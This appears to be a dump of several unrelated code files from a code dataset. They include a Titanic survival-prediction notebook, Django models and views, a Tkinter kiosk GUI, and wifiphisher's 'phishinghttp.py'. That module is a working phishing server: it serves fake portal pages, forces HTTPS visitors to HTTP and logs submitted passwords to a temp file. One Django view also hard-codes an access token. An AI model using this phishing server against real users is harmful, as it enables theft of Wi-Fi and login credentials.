training.\r\n\r\n\r\n\r\n\r\n# Correlating categorical and numerical features¶\r\n# consider correlating Embarked (Categorical non-numeric), Sex (Categorical non-numeric), \r\n# Fare (Numeric continuous), with Survived (Categorical numeric).\r\n# grid = sns.FacetGrid(train_df, col='Embarked', hue='Survived', palette={0: 'k', 1: 'w'})\r\ngrid = sns.FacetGrid(train_df, row='Embarked', col='Survived', size=2.2, aspect=1.6)\r\ngrid.map(sns.barplot, 'Sex', 'Fare', alpha=.5, ci=None)\r\ngrid.add_legend()\r\n# Higher fare paying passengers had better survival.\r\n# Port of embarkation correlates with survival rates\r\n# Consider banding Fare feature.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# we want to drop the Cabin (correcting #2) and Ticket (correcting #1) features.\r\n# IMPORTANT perform operations on both training and testing datasets\r\nprint(\"Before\", train_df.shape, test_df.shape, combine[0].shape, combine[1].shape)\r\n\r\ntrain_df = train_df.drop(['Ticket', 'Cabin'], axis=1)\r\ntest_df = test_df.drop(['Ticket', 'Cabin'], axis=1)\r\ncombine = [train_df, test_df]\r\n\r\nprint(\"After\", train_df.shape, test_df.shape, combine[0].shape, combine[1].shape)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# extract Title feature from Name using regular expressions.\r\n# RegEx pattern (\\w+\\.) matches the first word which ends with a dot character within Name feature. \r\n# The expand=False flag returns a DataFrame.\r\nfor dataset in combine:\r\n dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\r\n\r\npd.crosstab(train_df['Title'], train_df['Sex'])\r\n# if we plot Title, Age, and Survived, we note the following observations:\r\n# Most titles band Age groups accurately. For example: Master title has Age mean of 5 years.\r\n# Survival among Title Age bands varies slightly.\r\n# Certain titles mostly survived (Mme, Lady, Sir) or did not (Don, Rev, Jonkheer).\r\n\r\n# keep the new Title feature for model training.\r\n\r\n\r\n# replace many titles with a more common name or classify them as Rare.\r\nfor dataset in combine:\r\n dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\\\r\n \t'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')\r\n\r\n dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss')\r\n dataset['Title'] = dataset['Title'].replace('Ms', 'Miss')\r\n dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs')\r\n \r\ntrain_df[['Title', 'Survived']].groupby(['Title'], as_index=False).mean()\r\n\r\n\r\n\r\n# convert the categorical titles to ordinal.\r\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Rare\": 5}\r\nfor dataset in combine:\r\n dataset['Title'] = dataset['Title'].map(title_mapping)\r\n dataset['Title'] = dataset['Title'].fillna(0)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n# drop the Name feature from training and testing datasets. \r\n# We also do not need the PassengerId feature in the training dataset.\r\ntrain_df = train_df.drop(['Name', 'PassengerId'], axis=1)\r\ntest_df = test_df.drop(['Name'], axis=1)\r\ncombine = [train_df, test_df]\r\ntrain_df.shape, test_df.shape\r\n\r\n\r\n# convert categorical features which contain strings to numerical values\r\n# converting Sex feature to a new feature called Gender where female=1 and male=0.\r\nfor dataset in combine:\r\n dataset['Sex'] = dataset['Sex'].map( {'female': 1, 'male': 0} ).astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# Completing a numerical continuous feature\r\n# Guess Age using median values for Age across sets of Pclass and Gender feature combinations. \r\n# grid = sns.FacetGrid(train_df, col='Pclass', hue='Gender')\r\ngrid = sns.FacetGrid(train_df, row='Pclass', col='Sex', size=2.2, aspect=1.6)\r\ngrid.map(plt.hist, 'Age', alpha=.5, bins=20)\r\ngrid.add_legend()\r\n# prepare an empty array to contain guessed Age values based on Pclass x Gender combinations.\r\nguess_ages = np.zeros((2,3))\r\nguess_ages\r\n# iterate over Sex (0 or 1) and Pclass (1, 2, 3) to calculate guessed values of Age for the six combinations.\r\nfor dataset in combine:\r\n for i in range(0, 2):\r\n for j in range(0, 3):\r\n guess_df = dataset[(dataset['Sex'] == i) & \\\r\n (dataset['Pclass'] == j+1)]['Age'].dropna()\r\n\r\n # age_mean = guess_df.mean()\r\n # age_std = guess_df.std()\r\n # age_guess = rnd.uniform(age_mean - age_std, age_mean + age_std)\r\n\r\n age_guess = guess_df.median()\r\n\r\n # Convert random age float to nearest .5 age\r\n guess_ages[i,j] = int( age_guess/0.5 + 0.5 ) * 0.5\r\n \r\n for i in range(0, 2):\r\n for j in range(0, 3):\r\n dataset.loc[ (dataset.Age.isnull()) & (dataset.Sex == i) & (dataset.Pclass == j+1),\\\r\n 'Age'] = guess_ages[i,j]\r\n\r\n dataset['Age'] = dataset['Age'].astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# create Age bands and determine correlations with Survived.\r\ntrain_df['AgeBand'] = pd.cut(train_df['Age'], 5)\r\ntrain_df[['AgeBand', 'Survived']].groupby(['AgeBand'], as_index=False).mean().sort_values(by='AgeBand', ascending=True)\r\n# replace Age with ordinals based on these bands.\r\nfor dataset in combine: \r\n dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0\r\n dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1\r\n dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2\r\n dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3\r\n dataset.loc[ dataset['Age'] > 64, 'Age']\r\ntrain_df.head()\r\n#We can now remove the AgeBand feature.\r\ntrain_df = train_df.drop(['AgeBand'], axis=1)\r\ncombine = [train_df, test_df]\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# Creating new features combining existing features\r\n# create new feature for FamilySize which combines Parch and SibSp. \r\n# and drop Parch and SibSp from our datasets.\r\nfor dataset in combine:\r\n dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1\r\n\r\ntrain_df[['FamilySize', 'Survived']].groupby(['FamilySize'], as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n# create another feature called IsAlone.\r\nfor dataset in combine:\r\n dataset['IsAlone'] = 0\r\n dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1\r\n\r\ntrain_df[['IsAlone', 'Survived']].groupby(['IsAlone'], as_index=False).mean()\r\n# drop Parch, SibSp, and FamilySize features in favor of IsAlone.\r\ntrain_df = train_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1)\r\ntest_df = test_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1)\r\ncombine = [train_df, test_df]\r\n\r\ntrain_df.head()\r\n# create an artificial feature combining Pclass and Age.\r\nfor dataset in combine:\r\n dataset['Age*Class'] = dataset.Age * dataset.Pclass\r\n\r\ntrain_df.loc[:, ['Age*Class', 'Age', 'Pclass']].head(10)\r\n\r\n\r\n\r\n\r\n# Completing a categorical feature\r\n# Embarked feature takes S, Q, C values based on port of embarkation. \r\n# Our training dataset has two missing values. \r\n# We simply fill these with the most common occurance.\r\nfreq_port = train_df.Embarked.dropna().mode()[0]\r\nfreq_port\r\n\r\nfor dataset in combine:\r\n dataset['Embarked'] = dataset['Embarked'].fillna(freq_port)\r\n \r\ntrain_df[['Embarked', 'Survived']].groupby(['Embarked'], \r\n as_index=False).mean().sort_values(by='Survived', ascending=False)\r\n\r\n\r\n\r\n\r\n# Converting categorical feature to numeric\r\n# now convert the EmbarkedFill feature by creating a new numeric Port feature.\r\nfor dataset in combine:\r\n dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)\r\n\r\ntrain_df.head()\r\n\r\n\r\n\r\n\r\n# Quick completing and converting a numeric feature¶\r\n# complete the Fare feature for single missing value in test dataset \r\n# we are not creating an intermediate new feature or doing any further analysis \r\n# for correlation to guess missing feature as we are replacing only a single value. \r\ntest_df['Fare'].fillna(test_df['Fare'].dropna().median(), inplace=True)\r\ntest_df.head()\r\n# create FareBand.\r\ntrain_df['FareBand'] = pd.qcut(train_df['Fare'], 4)\r\ntrain_df[['FareBand', 'Survived']].groupby(['FareBand'], as_index=False).mean().sort_values(by='FareBand', ascending=True)\r\n\r\n# Convert the Fare feature to ordinal values based on the FareBand.\r\nfor dataset in combine:\r\n dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0\r\n dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1\r\n dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare'] = 2\r\n dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3\r\n dataset['Fare'] = dataset['Fare'].astype(int)\r\n\r\ntrain_df = train_df.drop(['FareBand'], axis=1)\r\ncombine = [train_df, test_df]\r\n \r\ntrain_df.head(10)\r\ntest_df.head(10)\r\n\r\n\r\n\r\n\r\n#### Model, prediction and solving\r\n# train a model and predict the required solution\r\n# Our problem is a classification and regression problem.\r\n# We want to identify relationship between output (Survived or not) with other variables or features (Gender, Age, Port...).\r\n# also perfoming a category of machine learning which is called \r\n# supervised learning as we are training our model with a given dataset. \r\n\r\n# Supervised Learning plus Classification and Regression, ==> a few models\r\nX_train = train_df.drop(\"Survived\", axis=1)\r\nY_train = train_df[\"Survived\"]\r\nX_test = test_df.drop(\"PassengerId\", axis=1).copy()\r\nX_train.shape, Y_train.shape, X_test.shape\r\n\r\n\r\n\r\n\r\n\r\n#1 Logistic Regression\r\nlogreg = LogisticRegression()\r\nlogreg.fit(X_train, Y_train)\r\nY_pred = logreg.predict(X_test)\r\nacc_log = round(logreg.score(X_train, Y_train) * 100, 2)\r\nacc_log\r\n\r\n# Positive coefficients increase the log-odds of the response (and thus increase the probability)\r\ncoeff_df = pd.DataFrame(train_df.columns.delete(0))\r\ncoeff_df.columns = ['Feature']\r\ncoeff_df[\"Correlation\"] = pd.Series(logreg.coef_[0])\r\n\r\ncoeff_df.sort_values(by='Correlation', ascending=False)\r\n# Sex is highest positivie coefficient, implying as the Sex value increases \r\n# (male: 0 to female: 1), the probability of Survived=1 increases the most.\r\n# as Pclass increases, probability of Survived=1 decreases the most.\r\n# Age*Class is a good artificial feature to model as it has second highest \r\n# negative correlation with Survived. So is Title as second highest positive correlation.\r\n\r\n\r\n\r\n\r\n\r\n\r\n#2 Support Vector Machines\r\nsvc = SVC()\r\nsvc.fit(X_train, Y_train)\r\nY_pred = svc.predict(X_test)\r\nacc_svc = round(svc.score(X_train, Y_train) * 100, 2)\r\nacc_svc\r\n# this model generates a confidence score higher than Logistics Regression\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#3 k-Nearest Neighbors algorithm (or k-NN for short) is a \r\n# non-parametric method used for classification and regression\r\nknn = KNeighborsClassifier(n_neighbors = 3)\r\nknn.fit(X_train, Y_train)\r\nY_pred = knn.predict(X_test)\r\nacc_knn = round(knn.score(X_train, Y_train) * 100, 2)\r\nacc_knn\r\n\r\n# KNN confidence score is better than Logistics Regression but worse than SVM\r\n\r\n\r\n\r\n\r\n\r\n#4 naive Bayes classifiers are a family of simple probabilistic classifiers based on applying Bayes' theorem\r\n# Gaussian Naive Bayes\r\n\r\ngaussian = GaussianNB()\r\ngaussian.fit(X_train, Y_train)\r\nY_pred = gaussian.predict(X_test)\r\nacc_gaussian = round(gaussian.score(X_train, Y_train) * 100, 2)\r\nacc_gaussian\r\n# confidence score is the lowest among the models\r\n\r\n\r\n\r\n\r\n\r\n\r\n#5 perceptron is an algorithm for supervised learning of binary classifiers\r\nperceptron = Perceptron()\r\nperceptron.fit(X_train, Y_train)\r\nY_pred = perceptron.predict(X_test)\r\nacc_perceptron = round(perceptron.score(X_train, Y_train) * 100, 2)\r\nacc_perceptron\r\n\r\n\r\n\r\n\r\n\r\n\r\n#6 # Linear SVC\r\n\r\nlinear_svc = LinearSVC()\r\nlinear_svc.fit(X_train, Y_train)\r\nY_pred = linear_svc.predict(X_test)\r\nacc_linear_svc = round(linear_svc.score(X_train, Y_train) * 100, 2)\r\nacc_linear_svc\r\n\r\n\r\n\r\n\r\n\r\n#7 Stochastic Gradient Descent\r\nsgd = SGDClassifier()\r\nsgd.fit(X_train, Y_train)\r\nY_pred = sgd.predict(X_test)\r\nacc_sgd = round(sgd.score(X_train, Y_train) * 100, 2)\r\nacc_sgd\r\n\r\n\r\n\r\n\r\n\r\n#8 # Decision Tree\r\n\r\ndecision_tree = DecisionTreeClassifier()\r\ndecision_tree.fit(X_train, Y_train)\r\nY_pred = decision_tree.predict(X_test)\r\nacc_decision_tree = round(decision_tree.score(X_train, Y_train) * 100, 2)\r\nacc_decision_tree\r\n\r\n\r\n\r\n\r\n#9 Random Forest\r\n\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(X_train, Y_train)\r\nY_pred = random_forest.predict(X_test)\r\nrandom_forest.score(X_train, Y_train)\r\nacc_random_forest = round(random_forest.score(X_train, Y_train) * 100, 2)\r\nacc_random_forest\r\n\r\n\r\n\r\n\r\n##### Model evaluation\r\nmodels = pd.DataFrame({\r\n 'Model': ['Support Vector Machines', 'KNN', 'Logistic Regression', \r\n 'Random Forest', 'Naive Bayes', 'Perceptron', \r\n 'Stochastic Gradient Decent', 'Linear SVC', \r\n 'Decision Tree'],\r\n 'Score': [acc_svc, acc_knn, acc_log, \r\n acc_random_forest, acc_gaussian, acc_perceptron, \r\n acc_sgd, acc_linear_svc, acc_decision_tree]})\r\nmodels.sort_values(by='Score', ascending=False)\r\n# While both Decision Tree and Random Forest score the same, \r\n# we choose to use Random Forest as they correct for decision trees' \r\n# habit of overfitting to their training set.\r\n\r\n\r\nsubmission = pd.DataFrame({\r\n \"PassengerId\": test_df[\"PassengerId\"],\r\n \"Survived\": Y_pred\r\n })\r\n\r\nsubmission.to_csv(r'C:\\MyPython\\titanic\\submission.csv', index=False)\r\nprint (submission) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":18100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58568671","text":"from django.db import models\n\n# Create your models here.\n\nclass Sector(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n class Meta:\n verbose_name =\"sector\"\n verbose_name_plural = \"sectores\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Comments(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n email = models.CharField(max_length=200,verbose_name=\"Email\")\n message = models.TextField(verbose_name=\"Mensaje\")\n class Meta:\n verbose_name =\"comentario\"\n verbose_name_plural = \"comentarios\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n \nclass Family(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n sector = models.ForeignKey(Sector,verbose_name=\"sector\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"familia\"\n verbose_name_plural = \"familias\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Activity(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n family = models.ForeignKey(Family,verbose_name=\"familia\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"actividad\"\n verbose_name_plural = \"actividades\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\nclass Level(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n description = models.TextField(verbose_name=\"Descripción\",blank=True)\n credits_min = models.IntegerField()\n class Meta:\n verbose_name =\"nivel\"\n verbose_name_plural = \"niveles\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\nclass Program(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n code = models.CharField(max_length=10,verbose_name=\"Código\")\n activity = models.ForeignKey(Activity,verbose_name=\"actividad\",on_delete=models.CASCADE)\n level = models.ForeignKey(Level,verbose_name=\"nivel\",on_delete=models.CASCADE)\n class Meta:\n verbose_name =\"programa\"\n verbose_name_plural = \"programas\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\nclass Institute(models.Model):\n name = models.CharField(max_length=500,verbose_name=\"Nombre\")\n code = models.CharField(max_length=10,verbose_name=\"Código\")\n programs = models.ManyToManyField(Program,verbose_name=\"Programas\")\n class Meta:\n verbose_name =\"instituto\"\n verbose_name_plural = \"institutos\"\n ordering = [\"-name\"]\n def __str__(self):\n return self.name\n\n","sub_path":"qualifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452455528","text":"from django.shortcuts import render\nfrom views_api import *\n\n# Create your views here.\ndef PortalMain(request, page):\n if page == 'profile':\n api_url = '\"http://localhost:8080/api/get/user/\", {access_token:\\'72b346aaaea45f82f0b8055e1fcf344f550b5025\\', user_id:1}'\n elif page == 'chapters':\n api_url = ''\n elif page == 'characters':\n api_url = '\"http://localhost:8080/api/get/character/\", {access_token:\\'72b346aaaea45f82f0b8055e1fcf344f550b5025\\', character_id:1}'\n else:\n api_url = ''\n\n context = {\n 'api_url': api_url,\n 'page': page\n }\n return render(request, 'main.html', context)\n\n\n","sub_path":"gameheart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"10953552","text":"import SimpleHTTPServer\nimport BaseHTTPServer\nimport httplib\nimport SocketServer\nimport ssl\nimport socket\nimport cgi\nimport os\nfrom constants import *\n\ntemplate = False\nterminate = False\n\nclass SecureHTTPServer(BaseHTTPServer.HTTPServer):\n \"\"\"\n Simple HTTP server that extends the SimpleHTTPServer standard\n module to support the SSL protocol.\n\n Only the server is authenticated while the client remains\n unauthenticated (i.e. the server will not request a client\n certificate).\n\n It also reacts to self.stop flag.\n \"\"\"\n def __init__(self, server_address, HandlerClass):\n SocketServer.BaseServer.__init__(self, server_address, HandlerClass)\n self.socket = ssl.SSLSocket(\n socket.socket(self.address_family, self.socket_type),\n keyfile=PEM,\n certfile=PEM\n )\n\n self.server_bind()\n self.server_activate()\n\n def serve_forever(self):\n \"\"\"\n Handles one request at a time until stopped.\n \"\"\"\n self.stop = False\n while not self.stop:\n self.handle_request()\n\n\nclass SecureHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"\n Request handler for the HTTPS server. It responds to\n everything with a 301 redirection to the HTTP server.\n \"\"\"\n def do_QUIT(self):\n \"\"\"\n Sends a 200 OK response, and sets server.stop to True\n \"\"\"\n self.send_response(200)\n self.end_headers()\n self.server.stop = True\n\n def setup(self):\n self.connection = self.request\n self.rfile = socket._fileobject(self.request, \"rb\", self.rbufsize)\n self.wfile = socket._fileobject(self.request, \"wb\", self.wbufsize)\n\n def do_GET(self):\n self.send_response(301)\n self.send_header('Location', 'http://' + NETWORK_GW_IP + ':' + str(PORT))\n self.end_headers()\n\n def log_message(self, format, *args):\n return\n\n\nclass HTTPServer(BaseHTTPServer.HTTPServer):\n \"\"\"\n HTTP server that reacts to self.stop flag.\n \"\"\"\n\n def serve_forever(self):\n \"\"\"\n Handle one request at a time until stopped.\n \"\"\"\n self.stop = False\n while not self.stop:\n self.handle_request()\n\n\nclass HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"\n Request handler for the HTTP server that logs POST requests.\n \"\"\"\n def redirect(self, page=\"/\"):\n self.send_response(301)\n self.send_header('Location', page)\n self.end_headers()\n\n def do_QUIT(self):\n \"\"\"\n Sends a 200 OK response, and sets server.stop to True\n \"\"\"\n self.send_response(200)\n self.end_headers()\n self.server.stop = True\n\n def do_GET(self):\n global template\n\n template_path = template.get_path()\n wifi_webserver_tmp = \"/tmp/wifiphisher-webserver.tmp\"\n with open(wifi_webserver_tmp, \"a+\") as log_file:\n log_file.write('[' + T + '*' + W + '] ' + O + \"GET \" + T +\n self.client_address[0] + W + \"\\n\"\n )\n log_file.close()\n if not os.path.isfile(\"%s/%s\" % (template_path, self.path)):\n self.path = \"index.html\"\n\n if self.path.endswith(\".html\"):\n self.send_response(200)\n self.send_header('Content-type', 'text-html')\n self.end_headers()\n # Send file content to client\n self.wfile.write(template.render(self.path).encode('utf-8'))\n return\n # Leave binary and other data to default handler.\n else:\n os.chdir(template_path)\n SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\n def do_POST(self):\n global terminate\n redirect = False\n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD': 'POST',\n 'CONTENT_TYPE': self.headers['Content-type'],\n })\n if not form.list:\n return\n for item in form.list:\n if item.name and item.value and POST_VALUE_PREFIX in item.name:\n redirect = True\n wifi_webserver_tmp = \"/tmp/wifiphisher-webserver.tmp\"\n with open(wifi_webserver_tmp, \"a+\") as log_file:\n log_file.write('[' + T + '*' + W + '] ' + O + \"POST \" +\n T + self.client_address[0] +\n R + \" \" + item.name + \"=\" + item.value +\n W + \"\\n\"\n )\n log_file.close()\n if redirect:\n self.redirect(\"/upgrading.html\")\n terminate = True\n return\n self.redirect()\n\n def log_message(self, format, *args):\n return\n\n\ndef stop_server(port=PORT, ssl_port=SSL_PORT):\n \"\"\"\n Sends QUIT request to HTTP server running on localhost:\n \"\"\"\n conn = httplib.HTTPConnection(\"localhost:%d\" % port)\n conn.request(\"QUIT\", \"/\")\n conn.getresponse()\n\n conn = httplib.HTTPSConnection(\"localhost:%d\" % ssl_port)\n conn.request(\"QUIT\", \"/\")\n conn.getresponse()\n\n\ndef serve_template(t):\n global template\n template = t\n","sub_path":"phishinghttp.py","file_name":"phishinghttp.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"485741142","text":"from tkinter import *\nfrom tkinter import ttk\nimport os\nfrom os import path\nimport requests\nimport zipfile\nimport io\n\nimport subprocess\nimport shutil\nimport json\n\nimport socket\n\nimport threading\nimport time\nimport logging\nimport configparser\n\nimport urllib\nfrom urllib import request\nfrom urllib import error\n\n\n# Logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfile_handler = logging.FileHandler(filename='../logs/detect.log', encoding=\"UTF-8\")\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\nclass DetectGui:\n def __init__(self, master, detect_global_info):\n self.master = master\n self.detect_global_info = detect_global_info\n self._create_gui()\n # gif running\n # self.create_run_run_gif_thread()\n # infinity loop run once every three seconds\n self._run_detect_function()\n # self._create_run_detect_thread = threading.Timer(3, self._run_detect_function)\n # self._create_run_detect_thread.start()\n\n def _create_gui(self):\n self.master.configure(background='#e4f9ff') # #e4f9ff 5c821A DCE1F9\n\n # 透明感覺 transparent\n # self.master.attributes('-alpha', 0.9)\n # 抓取檔案路近位置\n self.direction_path = os.getcwd()\n # window 視窗坐上繳小圖示\n self.master.iconbitmap(\"{}/src/hyweb.ico\".format(self.direction_path))\n self.master.title(\"\")\n\n # 改變視窗大小\n self.master.resizable(False, False)\n self.master.state('zoomed')\n\n # 全視窗\n self.master.attributes('-fullscreen', True)\n self.master.geometry(\"300x200+1+1\")\n\n # self.master.overrideredirect(True) ---> 開啟後可更改視窗全螢幕(geometry)的鎖定\n # self.master.geometry(\"{0}x{1}+0+0\".format(self.master.winfo_screenwidth(), self.master.winfo_screenheight()))\n self.master.focus_set() # <-- move focus to this widget\n\n # 用esc就可以觀視窗\n self.master.bind(\"\", lambda e: self.master.destroy())\n\n # 讓視窗在最上層\n self.master.attributes('-topmost', True)\n\n # 把 X(exit) 功能關閉, alt + f4 也不行 呼叫 下方的 空的 callaback 程式 (disable_event)\n self.master.protocol(\"WM_DELETE_WINDOW\", self.disable_event)\n\n # 圖片連結 (記得 產出EXE檔案的時候 圖片連結沒有 EXE 會爆掉!! 最好的方式 就是放在同一下的 src/xxx.png )\n # C:\\\\Users\\\\Yuting\\\\Desktop\\\\HyWeb\\\\others\\\\icon\\\\hyweb.png\n # D:\\\\HyWeb\\\\Python\\\\Project\\\\src\\\\Chihlee.png --> chihlee logo\n\n # 抓取目前路徑位置\n self.cwd = os.getcwd()\n # 設定路徑位置\n # 在 python compiler 中 ---> base_path = os.path.abspath(os.path.join(os.path.dirname( __file__ )))\n self.base_path = os.path.abspath(os.path.join(os.getcwd()))\n # 在 exe 中 ---> base_path = os.path.abspath(os.path.join(os.getcwd()))\n self.file_path = path.abspath(path.join(self.base_path, \"..\"))\n\n self.master.rowconfigure(0, weight=1)\n self.master.rowconfigure(1, weight=1)\n self.master.rowconfigure(2, weight=1)\n self.master.rowconfigure(3, weight=1)\n self.master.rowconfigure(4, weight=1)\n self.master.rowconfigure(5, weight=1)\n self.master.rowconfigure(6, weight=1)\n self.master.rowconfigure(7, weight=1)\n\n self.master.columnconfigure(0, weight=1)\n self.master.columnconfigure(1, weight=1)\n self.master.columnconfigure(2, weight=1)\n self.master.columnconfigure(3, weight=1)\n self.master.columnconfigure(4, weight=1)\n self.master.columnconfigure(5, weight=1)\n self.master.columnconfigure(6, weight=1)\n self.master.columnconfigure(7, weight=1)\n self.master.columnconfigure(8, weight=1)\n self.master.columnconfigure(9, weight=1)\n self.master.columnconfigure(10, weight=1)\n self.master.columnconfigure(11, weight=1)\n self.master.columnconfigure(12, weight=1)\n self.master.columnconfigure(13, weight=1)\n self.master.columnconfigure(14, weight=1)\n\n self._img = PhotoImage(file='{}/src/hyweb_logo.png'.format(self.direction_path))\n\n # costume color 特製FRAME的顏色 (未來等python: def, class, module 熟一點) 可改成程式產生\n fm_bg_1 = '#FF6F00' # #FF6F00 #FFCCBC\n fm_bg_2 = '#9CCC65' # #9CCC65 #C5CAE9\n fm_bg_3 = '#9CCC65' # #9CCC65 #C5E1A5\n fm_bg_4 = '#F06292' # #F06292 #F8BBD0\n fm_bg_5 = '#4DD0E1' # #4DD0E1 #FFE0B2\n fm_bg_6 = '#7ee2ff'\n fm_bg_7 = '#e4f9ff' # 95A5A6\n\n fm_bg_upper = '#A4CABC' # 426E86 E2E8E4 7BA4A8 78A5A3 5978a6 1E656D FFB266 #7DCEA0 #F0B27A #A2D9CE 90AFC5\n fm_bg_lower = '#FFB266' # E2E8E4 7BA4A8 78A5A3 5978a6\n\n self.style_frame_bg = ttk.Style()\n self.style_frame_bg.configure('BG1.TFrame', background=fm_bg_1)\n\n self.style_frame_bg.configure('BG2.TFrame', background=fm_bg_2)\n self.style_frame_bg.configure('BG3.TFrame', background=fm_bg_3)\n self.style_frame_bg.configure('BG4.TFrame', background=fm_bg_4)\n self.style_frame_bg.configure('BG5.TFrame', background=fm_bg_5)\n self.style_frame_bg.configure('BG6.TFrame', background=fm_bg_7)\n\n # NEW LAYOUT CUSTOM STYLE\n # #ED8C72 #FFEC5C #EAB364 #002C54 #006C84 #FFCCBB #444C5C #E7552C #FBE9E7 #EED8C9 #336B87 006C84\n self.style_frame_bg.configure('Upper_log.TFrame', background='#E2E8E4')\n\n # #85C1E9 #36688D #888C46 #0AAFF1 #90AFC5 #AEBD38 #68829E #66A5AD #75B1A9 #1E656D #4D648D #239B56 #FFCCAC #68A225 #556DAC #2988BC #217CA3 #EFB509\n # #335252 #FFCCBB #6EB5C0 #353C3F #78A5A3 #344D90 #FFBEBD #FCFCFA #FAAE3D #488a99 #A5C05B\n self.style_frame_bg.configure('Upper.TFrame', background=fm_bg_upper)\n\n # #F4D03F #F49F05 #FF4500 #EDF259 #336B87 #598234 #AEBD38 #C4DFE6 #D9B44A #F1F3CE #D0E1F9 #148F77 #FDD475 #B3DE81 #F79B77 #2F496E #E29930 #CD7213\n # #D4DDE1 #6EB5C0 #006C84 #FF8D3F #E1B16A #5CC5EF #FCFCFA #337BAE #E38533 #DBAE58 #7BA4A8\n self.style_frame_bg.configure('Lower.TFrame', background=fm_bg_lower)\n\n self.style_frame_bg.configure('Center_content.TFrame', background='snow')\n self.style_frame_bg.configure('Center_outer.TFrame', background='snow')\n\n # #FFBB00 #F9E79F #F4EADE #128277 #7D5642 #AA4B41 #2D3033 #E2E8E4 #CE5A57 #FFB745 #B4B4B4 FB6542\n self.style_frame_bg.configure('Center_bar.TFrame', background='#E2E8E4')\n # ==========================================\n # ==========================================\n # 全新的想法唷~~ 簡單 乾淨 不花俏!!!\n # ==========================================\n\n # 抓取使用者螢幕大小\n self.screen_width = self.master.winfo_screenwidth()\n self.screen_height = self.master.winfo_screenheight()\n # 想樣的 FRAME 長寬大小\n self.width_of_frame = self.screen_width * .50\n self.height_of_frame = self.screen_height * .33\n # 計算相對大小位置\n self.x_coordinate = (self.screen_width / 2) - (self.width_of_frame / 2)\n self.y_coordinate = (self.screen_height / 2) - (self.height_of_frame / 2)\n\n # ============================ upper / lower / center frame ==============================================================\n # block gap\n self.outer_x_y = 4\n self.inner_x_y = 2\n # upper frame\n self.upper_frame_1 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_1.grid(row=0, column=0, rowspan=2, padx=(self.outer_x_y, self.inner_x_y),\n 